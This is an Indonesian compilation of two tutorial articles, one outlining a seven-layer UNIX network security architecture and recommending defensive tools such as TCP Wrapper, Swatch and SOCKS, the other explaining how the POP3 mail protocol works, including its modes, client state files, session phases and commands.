Sebagai permulaan, ada baiknya kita melihat sebuah sistem jaringan yang telah menjadi titik sasaran utama dari usaha-usaha percobaan pembobolan tersebut. Pada umumnya, jaringan komputer di dunia menggunakan sistem operasi Unix sebagai platform. Unix telah menjadi sebuah sistem operasi yang memiliki keandalan tinggi dan tingkat performansi yang baik. Tetapi, pada dasarnya Unix tersusun oleh fungsi-fungsi yang cukup rumit dan kompleks. Akibatnya, Unix juga memiliki beberapa kelemahan seperti bug-bug (ketidaksesuaian algoritma pemrograman) kecil yang kadang kala tidak disadari oleh para pemrogram Unix. Selain itu, utilitas-utilitas yang memanfaatkan Unix sebagai platformnya, seringkali mempunyai bug-bug tersendiri pula. Nah, hal-hal inilah yang sering dieksploitasi oleh para hacker dan intruder di seluruh dunia.

Guna mencegah berhasilnya eksploitasi para hacker dan intruder tersebut, dikembangkan sebuah konsep yang dikenal dengan UNIX Network Security Architecture. Arsitektur ini mencakup 7 lapis tingkat sekuriti pada jaringan. Ketujuh lapis tersebut adalah sebagai berikut :

• Lapis ke-7 : Kebijaksanaan
• Lapis ke-6 : Personil
• Lapis ke-5 : Local Area Network
• Lapis ke-4 : Batas Dalam Jaringan
• Lapis ke-3 : Gateway
• Lapis ke-2 : Paket Filtering
• Lapis ke-1 : Batas Luar Jaringan

Kebijaksanaan
Lapis kebijaksanaan menjadi pelindung terhadap keseluruhan program proteksi dan sekuriti jaringan yang diterapkan. Lapis ini mempunyai fungsi mendefinisikan kebijakan-kebijakan organisasi mulai dari resiko yang paling besar yang mungkin didapat hingga bagaimana mengimplementasikan kebijaksanaan yang diambil terhadap prosedur-prosedur dasar dan peralatan yang digunakan. Lapis ini menjadi salah satu penentu utama keberhasilan program proteksi dan sekuriti sistem.

Personil
Lapis ini mendefinisikan segi manusia dalam sistem jaringan informasi. Personil yang melakukan instalasi, konfigurasi, pengoperasian hingga orang-orang yang mampu menjalankan akses-akses yang tersedia di sistem adalah termasuk dalam lapis ini. Kebijakan yang diambil pada lapis ini pada dasarnya harus mencerminkan tujuan-tujuan yang ingin dicapai dalam program proteksi dan sekuriti ini.

Local Area Network
Lapis selanjutnya mendefinisikan peralatan-peralatan dan data-data yang harus mendapatkan proteksi. Selain itu, lapis ini juga mencakup prosedur-prosedur pengawasan dan kontrol yang sering diterapkan dalam sistem.

Batas Dalam Jaringan Batas
Dalam Jaringan mendefinisikan lapisan sistem yang terkoneksi secara fisik ke daerah “penyangga” yang menjadi pemisah antara sistem jaringan informasi lokal dengan jaringan luar. Batas ini menjadi penting karena titik ini menjadi sasaran utama usaha-usaha eksploitasi untuk memperoleh akses illegal. Ada baiknya daerah penyangga ini dikonsentrasikan pada satu titik sehingga penerapan prosedur pengawasan dan kontrol menjadi lebih mudah. Demikian pula bila datang serangan dari luar sistem, hanya akan terdapat satu titik masuk yang paling utama. Dengan demikian, akan lebih mudah mengisolasi sistem yang dimiliki dari konektivitas ke luar bila terjadi gangguan.

Gateway
Gateway mendefinisikan menjadi pintu utama dari dan ke sistem yang dimiliki. Kebijaksanaan proteksi dan sekuriti sebuah sistem yang terkoneksi dengan wide-area network seharusnya lebih mengarahkan usaha-usaha yang ada untuk mengamankan lapis ini sebaik mungkin. Servis-servis publik ada baiknya diletakkan pada lapis tersebut guna meminimisasi kemungkinan akses yang lebih jauh ke dalam sistem.

Paket Filtering
Lapis ini mendefinisikan platform yang berada di antara network interface lapis 3 (gateway) dengan network interface yang menjadi tempat penerapan metoda Firewall. Lapis tersebut lebih bersifat sebagai program yang menjalankan fungsi pengawasan (monitoring) terhadap paket-paket data yang masuk maupun yang keluar sistem.

Batas Luar Jaringan
Batas Luar Jaringan mendefinisikan titik dimana sistem terhubung dengan wide-area network dan kita tidak memiliki kontrol langsung terhadap titik tersebut.

Seperti yang telah dijabarkan di atas, lapis ke-3 menjadi titik utama dan yang paling rawan dalam network security ini. Implementasi kebijaksanaan yang diambil pada layer ini hanya bisa dilakukan secara software. Terdapat beberapa jenis security software yang bisa digunakan untuk memperkuat usaha proteksi dan sekuriti sistem pada lapis ke-3 ini. Di antaranya adalah :

TCP Wrapper
Program ini menyediakan layanan monitoring dan kontrol terhadap network services. Pada dasarnya, yang dilakukan oleh program ini adalah membuat daftar log mengenai aktivitas-aktivitas hubungan yang terjadi. Program ini dapat diambil secara gratis melalui anonymous FTP via ftp.cert.org yang terletak pada direktori pub/tools/tcp_wrappers/tcp_wrappers.*

Swatch
Program Swatch menggabungkan daftar-daftar log yang telah diciptakan oleh program-program utilitas lain di samping kelebihannya yang mampu dikonfigurasi sehingga pada saat melakukan logging, Swatch bisa melakukan aksi lain berdasar pada prioritas-prioritas tertentu. Swatch tersedia melalui anonymous FTP dari sierra.stanford.edu pada direktori pub/sources.

SOCKS library dan sockd
Program ini menjadi alternatif lain dari implementasi konsep “TCP Wrapper”. Kegunaan utama program ini adalah mengkonsentrasikan semua layanan umum internet pada suatu titik. “sockd” dijalankan oleh “inetd” pada saat permintaan layanan tertentu muncul dan hanya memperbolehkan koneksi dari host-host yang telah terdaftar. Program ini tentu saja juga melakukan aktivitas log yang berkaitan dengan koneksi yang terjadi. Program ini dapat diperoleh melalui anonymous FTP pada host s1.gov pada direktori /pub dengan nama socks.tar.Z.

Penulis: Joko Yuliantoro & Onno W. Purbo

Mengenal Protokol POP

Saat ini di kalangan masyarakat pengguna internet, POP bukanlah suatu barang baru. Dengan menggunakan POP, seseorang mendapat kemudahan untuk mendapatkan mail miliknya dari sebuah mail server, tanpa perlu koneksi yang lama dengan internet yang tentu saja memakan biaya. Dibawah ini, penulis akan sedikit menerangkan tentang cara kerja dari POP. Pada tulisan ini, akan banyak ditemui istilah client dan server. Client dan server merupakan bagian dari arsitektur yang banyak digunakan pada implementasi layanan internet. Arsitektur ini biasa disebut sebagai client/server architecture. Pengertian client pada pembahasan tentang POP3 ini adalah pihak yang menggunakan layanan POP3 dan server adalah pihak yang menyediakan layanannya

Apakah POP itu ?

POP atau Post Office Protocol, sesuai dengan namanya merupakan protokol yang digunakan untuk pengelolaan mail. POP yang sekarang lebih umum dikenal dengan POP3 (POP - Version 3), dimaksudkan untuk mengizinkan client untuk mengakses secara dinamis mail yang masih ada di POP3 server. POP3 menawarkan pada user untuk meninggalkan mail-nya di POP3 server, dan mengambil mail-nya tersebut dari sejumlah sistem sebarang. Untuk mengambil mail dengan menggunakan POP3 dari suatu client, banyak pilihan yang dapat digunakan seperti Sun Microsystem Inc.’s Mailtool, QualComm Inc.’s Eudora, Netscape Comm. Corp.’s Netscape Mail dan Microsoft Corp.’s Outlook Express.

POP3 tidak dimaksudkan untuk menyediakan operasi manipulasi mail yang ada di server secara luas. Pada POP3, mail diambil dari server dan kemudian dihapus (bisa juga tidak dihapus). Segala sesuatu tentang protokol POP3 ini dibahas dalam RFC (Request For Comment) 1725. Protokol yang lebih tinggi dan lebih kompleks, yaitu IMAP4, dibahas dalam RFC 1730.

Mode POP3

Ada dua jenis mode pada POP3 yaitu mode offline dan mode inline. Pada mode offline, POP3 mengambil dan kemudian menghapus mail yang tersimpan dari server. POP3 bekerja dengan baik pada mode ini, karena terutama memang didisain untuk berlaku sebagai sebuah sistem mail yang memiliki sifat “store-and-forward”. Server, pada mode offline, berlaku seperti sebuah tempat penampungan yang menyimpan mail sampai user memintanya.

Pada mode inline, POP3 akan mengambil mail dari server tanpa menghapus mail yang sudah diambil tersebut. Mode ini lebih disukai oleh user yang sering berpindah tempat (nomadic user) karena memungkinkan mereka untuk melihat mail yang sama dari tempat atau komputer yang berbeda. Akan tetapi untuk nomadic user yang selalu bekerja dan bepergian dengan selalu membawa notebook, dan tetap menginginkan agar mail miliknya yang ada di server tidak dihapus, tentu saja menginginkan agar setiap kali mengambil mail tidak semua mail yang akan terambil, tapi hanya mail yang belum pernah dia lihat saja yang akan diambil. Keinginan user seperti ini dapat dipenuhi dengan menggunakan informasi pada client yang memungkinkan untuk memberi tanda mail yang sudah pernah dilihat. Setiap client layanan POP3 yang mendukung mode inline akan menyimpan informasi ini dalam sebuah file. Pada user yang menggunakan Netscape Mail, file yang menyimpan informasi ini adalah file popstate.dat, yang biasanya terdapat di /Program Files/Netscape/Users/Mail. File tersebut memberi tahu mail yang mana saja yang sudah diambil sehingga tidak perlu diambil lagi. Jika file ini dihapus maka tentu saja pada pengambilan mail berikutnya semua mail akan terambil. Contoh isi file popstate.dat untuk seorang user yang memiliki login misalnya ‘wandi’ di POP3 server students.itb.ac.id adalah sebagai berikut :

# Netscape POP3 State File
# This is a generated file! Do not edit.

*students.itb.ac.id wandi
k c67ee091087ed814337b4cb31e0d488c
k 8541822a98e890b88d8299d034993f61
k 652e17a1c984e610e4e55257c07b6ff4

Pada file ini kode dibelakang huruf k merupakan unique-id. Unique-id ini secara unik mengidentifikasi sebuah mail dalam maildrop sehingga masing-masing mail memiliki unique-id yang berbeda. Jika misalnya mail kita yang berada di komputer lokal sudah terhapus sedangkan kita ingin membacanya lagi, maka sebelum kita mengambil maildrop dari server, file popstate.dat ini harus dihapus terlebih dahulu. Apabila kita belum menghapus file tersebut maka akan ada pesan : ” no new messages on server “, yang diberikan oleh Netscape Mail. Untuk pemakai Eudora, file yang menyimpan informasi ini adalah file lmos.dat, sedangkan untuk pengguna Outlook Express biasanya menggunakan file pop3uidl.dat.

Operasi Dasar POP3

Pada awalnya, server memulai layanan POP3 dengan mendengarkan permintaan pada TCP port 110. Ketika sebuah client meminta layanan tersebut, maka terjadilah hubungan TCP dengan server. Pada saat hubungan dimulai, POP3 server mengirim greeting (kata pembuka). Setelah itu client akan memberikan command (perintah) ke server dan POP3 server akan memberikan response (jawaban) sampai hubungan ditutup atau digagalkan. Perlu diingat bahwa user tidak memasukkan perintah ini, tapi software dari client-lah yang mengirim perintah ini ke server.

Perintah-perintah di POP3 terdiri dari sebuah keyword yang tidak case sensitive (tidak mempersoalkan huruf kapital ataupun tidak), yang dapat diikuti oleh satu atau lebih argument. Keyword dan argument masing-masing dipisahkan oleh karakter SPACE (spasi). Keyword terdiri dari tiga atau empat karakter, sedangkan tiap argument dapat mencapai 40 karakter. Jawaban di POP3 terdiri dari sebuah indikator status dan sebuah keyword yang dapat diikuti oleh informasi tambahan. Ada dua indikator status : positif (”+OK”) dan negatif (”-ERR”). Server harus memberikan jawaban +OK dan -ERR dalam huruf kapital. Pada perintah tertentu, server akan memberikan jawaban yang terdiri dari beberapa baris.

Sebuah sesi hubungan POP3 dibangun melalui tiga tahap, yaitu tahap authorization, transaction dan update. Sekali hubungan TCP dimulai dan POP3 server telah mengirimkan greeting , maka sesi hubungan telah memasuki tahap authorization. Pada tahap ini client mengirim nama dan password user ke server untuk membuktian keaslian user tersebut agar dapat mengambil mail-nya. Ketika client telah berhasil membuktikan identitas dirinya, server akan memperoleh informasi yang berhubungan dengan mail yang dimiliki client tersebut, dan sesi kini memasuki tahap transaction. Pada tahap inilah terjadi proses penerimaan mail, penandaan mail untuk penghapusan, pembatalan penandaan untuk penghapusan, penampilan statistik mail atau perincian identitas mail. Pada saat client telah memberikan perintah quit untuk mengakhiri hubungan, maka sesi memasuki tahap update. Pada tahap inilah server akan menjalankan semua perintah yang diperoleh selama tahap transaction dan menutup sesi dan selanjutnya hubungan TCP ditutup.

Sebuah server harus menjawab perintah yang tidak dikenal, tidak diimplementasi, atau tidak sesuai dengan sintaksis dengan indikator status negatif. Server juga harus memberikan indikator status negatif, jika ada client yang memberikan perintah tidak pada tahap yang seharusnya. Tidak ada metoda umum yang dapat digunakan oleh client untuk membedakan antara server yang tidak mengimplementasikan perintah tambahan dengan server yang tidak dapat atau tidak bersedia memproses perintah tambahan tersebut.

Sebuah POP3 server mungkin memiliki autologout timer untuk client yang sedang tidak aktif dalam rentang waktu tertentu. Timer seperti ini harus paling sedikit memiliki rentang waktu 10 menit. Jika sebuah server menerima sebarang perintah dari client didalam rentang waktu tersebut, maka hal ini sudah cukup untuk me-reset autologout timer tersebut. Ketika waktu rentang timer sudah habis, tanpa ada aktivitas dari client maka sesi hubungan tidak memasuki tahap UPDATE. Server akan menutup hubungan TCP tanpa menghapus mail atau mengirim jawaban ke client.

Semua pesan yang disampaikan selama sesi hubungan POP3 harus disesuaikan dengan standar format dari Internet text messages. Internet text messages ini, secara terperinci dibahas dalam RFC 822. Tabel 1. dibawah ini memperlihatkan perintah-perintah pada POP3 berikut tahap tempat perintah tersebut digunakan.

Perintah Tahap USER AUTHORIZATION PASS QUIT STAT TRANSACTION LIST RETR DELE NOOP RSET QUIT UPDATE

Perintah POP3 yang terdapat pada tabel diatas adalah merupakan perintah-perintah dasar yang dilayani oleh semua POP3 server dengan implementasi minimal. Selain perintah diatas masih ada lagi beberapa perintah tambahan yang mengizinkan sebuah POP3 client untuk lebih bebas dalam penanganan mail miliknya pada saat berhubungan dengan POP3 server. Perintah tambahan beserta tahap yang dibenarkan untuk penggunaan perintah tersebut dapat dilihat pada tabel 2. dibawah ini:

Perintah Tahap APOP AUTHORIZATION TOP n TRANSACTION UIDL

POP3 mengerti semua perintah yang ditunjukkan oleh kedua tabel diatas, tapi POP3 hanya mengetahui tiga jawaban : “+OK ” , “-ERR ” dan daftar jawaban yang diakhiri dengan “.” (indikator akhir dari suatu daftar jawaban). Perlu diingat bahwa kecuali untuk perintah STAT, LIST, dan UIDL, jawaban yang diberikan oleh POP3 server pada setiap perintah adalah hanya “+OK” dan “-ERR”.

Penulis: Widjil Widodo